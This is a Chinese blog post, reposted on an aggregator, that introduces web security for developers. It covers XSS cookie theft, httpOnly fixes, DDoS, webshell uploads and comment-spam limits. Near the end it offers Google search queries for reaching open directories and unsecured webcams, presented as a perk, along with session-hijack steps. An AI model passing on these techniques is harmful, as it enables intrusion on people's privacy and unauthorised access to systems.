圖2.5.ok木有登陸！然后你是不是看見我的瀏覽器工具欄有個(gè)叫cookies的，不錯(cuò)我們現(xiàn)在就是要用他來填充我們剛剛控制臺(tái)獲取到的Test應(yīng)用cookie實(shí)現(xiàn)登陸！填充如上圖圖2.6.

《圖2.7》《圖2.8》

如圖2.7所示我填入的就是剛剛Demo控制臺(tái)打印出來的cookie就是剛剛admin登陸進(jìn)去的cookie.結(jié)果很顯然就是上圖2.8所示，admin移花接木成功登陸。到這里我們的完整演示完畢！

總結(jié)：上面的演示就是XSS真正跨站背后，駭客想要得到神馬樣的結(jié)果，結(jié)果就是遠(yuǎn)程獲取用戶cookie，實(shí)現(xiàn)駭客登陸系統(tǒng)任意執(zhí)行該用戶賬號(hào)行為（比如：發(fā)布消息，修改資料，刪除內(nèi)容等等），當(dāng)然現(xiàn)在基本瀏覽器都能攔截跨站攻擊，只要你的瀏覽器沒有取消此類設(shè)置，我在寫演示的時(shí)候幾乎主流都可以攔截只有火狐完全無視，chrome直接殺死連提示都木有。

防范措施：當(dāng)然面對(duì)上面的問題我們也有解決方案，就是采用httpOnly來阻止javascript來獲取或者說訪問cookie，以達(dá)到保護(hù)cookie的目的！這個(gè)還不夠因?yàn)榭缯镜穆┒催€在那里，所以我們需要做的還要消除跨站，過濾非法字符比如：<script></script>這樣的標(biāo)簽，還是那句老話，前后臺(tái)都要過濾，如果你覺得麻煩，后臺(tái)必須過濾！當(dāng)然大多數(shù)框架也已經(jīng)有這層過濾了。博客園的閃存也出現(xiàn)過XSS,不過我及時(shí)通知dudu修復(fù)！而且博客園cookie也是加了httponly的。

對(duì)于httponly各個(gè)語言都有自己的不同方式這里不貼代碼了，自己call大神google吧！好吧，真心寫到這里累了！不過繼續(xù)寫完！go on

還是貼一些吧：

java：

一種：response.setHeader("Set-Cookie", "cookiename=value;
Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");

一種：

也可以在 web.xml 配置如下：

<session-config>

<cookie-config>

? <http-only>true</http-only>

</cookie-config>

<session-config>

C#:

HttpCookie myCookie = new HttpCookie("myCookie");

myCookie.HttpOnly = true;

Response.AppendCookie(myCookie);

注意各版本不同，也會(huì)有區(qū)別。

DDOS攻擊

DDOS攻擊業(yè)界洪水攻擊，來勢(shì)洶洶，瞬間毀滅，歷史上國(guó)外駭客控制肉雞曾今導(dǎo)致電商網(wǎng)站十幾分鐘無法訪問，損失不言而喻！直到現(xiàn)在DDOS還是很難徹底解決，我們只能通過預(yù)防的手段來防止發(fā)生！這里也不好做演練簡(jiǎn)單講講！

其實(shí)原理就是同一時(shí)刻發(fā)起大量的http請(qǐng)求，導(dǎo)致服務(wù)器阻塞無法及時(shí)響應(yīng)而癱瘓，嚴(yán)重點(diǎn)服務(wù)器崩潰！這個(gè)類似于網(wǎng)站的吞吐量，前不久博客園的毛病就似乎是這樣一口氣下去差點(diǎn)上不來！現(xiàn)象是這樣，但也不能冒昧的斷定就是DDOS，阿里云號(hào)稱自己能抗這種攻擊！不過一般的DDOS量不大還可以！駭客手里都有這種小工具只要輸入網(wǎng)址鼠標(biāo)輕輕一點(diǎn)，選擇洪水大小，網(wǎng)站立刻就走上坡路了。

防范措施：這種情況最好首先優(yōu)化自己的系統(tǒng)整體性能包括數(shù)據(jù)庫性能，性能上去了，吞吐量上去了，然后再考慮配置高點(diǎn)的服務(wù)器，這樣性能才能調(diào)到最佳！還有就是盡可能的采用靜態(tài)頁面！也就是大家常說的網(wǎng)站靜態(tài)化這樣對(duì)于抵擋DDOS有很大幫助！最后想說的一點(diǎn)就是凡是用DDOS攻擊的都是閑的蛋碎的人弄的事情，記住是閑的蛋碎的人！哈哈！不是蛋疼的人哦！除去友情壓力測(cè)試的！一般情況下很少有人干這個(gè)事情，除非你得罪XXX,駭客一般情況拿它來宣泄政府！

文件上傳漏洞：

顧名思義就是文件上傳存在漏洞，怎么講呢？有些時(shí)候我們的上傳文件驗(yàn)證考慮不全面就會(huì)導(dǎo)致被惡意上傳文件。這種上傳的文件常見的就是前面我們提到的木馬文件（有php,jsp,asp,等等）kindeditor我朝的一款富文本編輯器，在上一個(gè)版本就發(fā)生上傳文件漏洞被駭客利用！一度也在互聯(lián)網(wǎng)引發(fā)軒然大波！其實(shí)就是上傳文件部分驗(yàn)證不夠規(guī)范，導(dǎo)致可以上傳木馬文件。

駭客手里有針對(duì)各種不同語言而開發(fā)的木馬文件，俗稱大馬，小馬，大馬上傳過去就可以獲得服務(wù)器遠(yuǎn)程管理權(quán)限，通過訪問自己上傳到你應(yīng)用的大馬實(shí)現(xiàn)遠(yuǎn)程操作服務(wù)器。進(jìn)而穿透C段網(wǎng)絡(luò)，掃描同段服務(wù)器，比如你的應(yīng)用架在VPS商那里，那么一臺(tái)服務(wù)器可能會(huì)涉及很多其他網(wǎng)站，這樣就可以通過一個(gè)網(wǎng)站滲透更多的網(wǎng)站！然而駭客要想走到這一步現(xiàn)在他需要登陸你的網(wǎng)站后臺(tái)管理頁面，然后找到存在此種漏洞的網(wǎng)頁上傳！所以顯然如果你存在前面的漏洞那你就是為駭客到這一步做鋪墊的！顯然這是一個(gè)連鎖反應(yīng)。

防范，這種就是檢查你的上傳文件部分，驗(yàn)證要全面，還有就是日志記錄，這樣以后即使發(fā)現(xiàn)問題，你就可以通過日志追蹤溯源很容易修改，有些駭客為了讓你很難找到上傳的文件，就會(huì)偽裝，所以對(duì)你來說維護(hù)起來很大麻煩！不定時(shí)的檢查目錄結(jié)構(gòu)！該有的權(quán)限設(shè)置必須加！

重點(diǎn)內(nèi)容講完了，我們?cè)俳又v點(diǎn)其他的一些知識(shí)，就是上次有人提到有些網(wǎng)站不能在一段時(shí)間內(nèi)多次評(píng)論，這個(gè)也算是一種安全策略，包括博客園也有這種策略（博客評(píng)論短時(shí)間內(nèi)不能多次評(píng)論，閃存不能連續(xù)發(fā)送5條以上的數(shù)據(jù)否則不顯示）其實(shí)這些是早起流行起來的是《論壇灌水機(jī)》，原理就是有些人會(huì)寫一些機(jī)器人工具自動(dòng)刷帖，自動(dòng)評(píng)論的！導(dǎo)致大量的無效數(shù)據(jù)存在，導(dǎo)致頁面顯示全是灌水機(jī)的。所以在寫對(duì)外網(wǎng)站論壇類必須重視這個(gè)。

接下來我們?cè)僦v講google怎么用，對(duì)，就是google怎么用，當(dāng)然有些人說這有神馬會(huì)用不會(huì)用的，不就是搜索嘛！錯(cuò)了，有種檢索的手法正是駭客常用手法，當(dāng)然一些人應(yīng)該也知道，知道的就不用看了！駭客常用這種手法來獲取攻擊目標(biāo)。即輸入：inurl:news.action?id= 亦或者website:baidu.com 簡(jiǎn)單講解，前面的那個(gè)就是檢索google搜索結(jié)果url里面以inurl：后面為結(jié)尾的網(wǎng)站。后面的檢索域名中包含baidu.com的網(wǎng)站。不要小瞧這兩個(gè)小玩意，很多駭客在用這種手法滿河撈魚。當(dāng)然news你隨意發(fā)揮，就比如黑客字典一樣，想到的越多或者越切近檢索目標(biāo)就能能找出你想要的。下面我再透漏一點(diǎn)。

在搜索框上輸入：“indexof/”inurl:lib

再按搜索你將進(jìn)入許多圖書館，并且一定能下載自己喜歡的書籍。

在搜索框上輸入：“indexof/”cnki

再按搜索你就可以找到許多圖書館的CNKI、VIP、超星等入口！

在搜索框上輸入：“indexof/”ppt

再按搜索你就可以突破網(wǎng)站入口下載powerpint作品！

在搜索框上輸入：“indexof/”mp3

再按搜索你就可以突破網(wǎng)站入口下載mp3、rm等影視作品！

在搜索框上輸入：“indexof/”swf

再按搜索你就可以突破網(wǎng)站入口下載flash作品！

在搜索框上輸入：“indexof/”要下載的軟件名

再按搜索你就可以突破網(wǎng)站入口下載軟件！

注意引號(hào)應(yīng)是英文的！

再透露一下，如果你輸入：

“indexof/”AVI

在google里輸入

inurl:"viewerframe?mode="

隨便打開一個(gè),然后按提示裝一個(gè)插件,就可以看到了!!!

以上都是福利哦！呵呵呵額。。。。。

全文總結(jié)：

好了，啰啰嗦嗦終于完了，我都快受不了了！歐碼噶的，大總結(jié)不知道寫點(diǎn)神馬了？這次寫的也不夠全面，只是片面的一面而已，也是常見的，為什么寫？因?yàn)楹芏嗑W(wǎng)站提交的漏洞70%來自以上漏洞。當(dāng)然還有各種框架漏洞（比如：struts2,記得前幾天這個(gè)漏洞再次爆出，使用springmvc的高興了一番，炫耀自己用這個(gè)沒問題，我想說的是，你錯(cuò)了！springmvc照樣有可執(zhí)行漏洞，只是沒有被爆！）有時(shí)間了好好整理一番！還有很多沒講到的！包括我們?nèi)绾蝸黹_發(fā)一款自己的黑客工具等等！一點(diǎn)要講的，我們必須清楚沒有最安全的只有更安全的！如果不是斯諾登的爆料有幾個(gè)人關(guān)系自己被美利堅(jiān)合眾國(guó)偷窺者？沒報(bào)之前還覺得自己曼妙的舞姿，爆料了，大家這個(gè)時(shí)候才覺得自己在光著屁股在路上走，各國(guó)總統(tǒng)憋不住掩耳盜鈴的滋味了，開始嘶吼你丫的太不厚道了吧，背后給我玩陰的！各國(guó)媒體更是更是唯恐天下不亂，大肆描畫著藍(lán)圖！新聞狂轟亂炸！奧先生或許在想，你們把我腫么樣？我還是在監(jiān)聽！我們的xi先生笑了，你丫的監(jiān)控？我們走的是自主研發(fā)！最后！我和我的小伙伴們都笑了（此段僅供娛樂）。

善意的忠告：

不要試圖作為一名黑客而黑客，黑客的門檻很高，很多人花錢買的一些教程都過時(shí)了，駭客做的基本都是xp下做的，要知道微軟明年將終結(jié)xp baby,不是每一個(gè)程序員就能做黑客，黑客有自己的文化、精神、黑客心理學(xué)，不吹噓的講，黑客的聰明就是程序員的逆向思維！還是那句話，真正的黑客不以攻擊為目的。黑客————就是一種信仰！也不要隨意的去破壞互聯(lián)網(wǎng)正常的發(fā)展秩序，當(dāng)然如果你作為一名駭客而活著那您隨意，每年國(guó)外都有這樣空前的駭客盛會(huì)！但是我的忠告是如果你繼續(xù)活在我朝，我朝貌似出臺(tái)了互聯(lián)網(wǎng)管理辦法，明確會(huì)處罰破壞互聯(lián)網(wǎng)穩(wěn)定的行為！道，可道，非常道。名，可名，非常名。一切皆塵埃。

ps:如果你沒有看過上篇，傳送：http://www.cnblogs.com/Beyond-bit/p/XWork_Lead_To_Struts2Bug.html

轉(zhuǎn)載于:https://www.cnblogs.com/Beyond-bit/p/Harcker_Is_Secret.html

總結(jié)

以上是生活随笔為你收集整理的程序世界系列之-带你了解安全背后的秘密的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。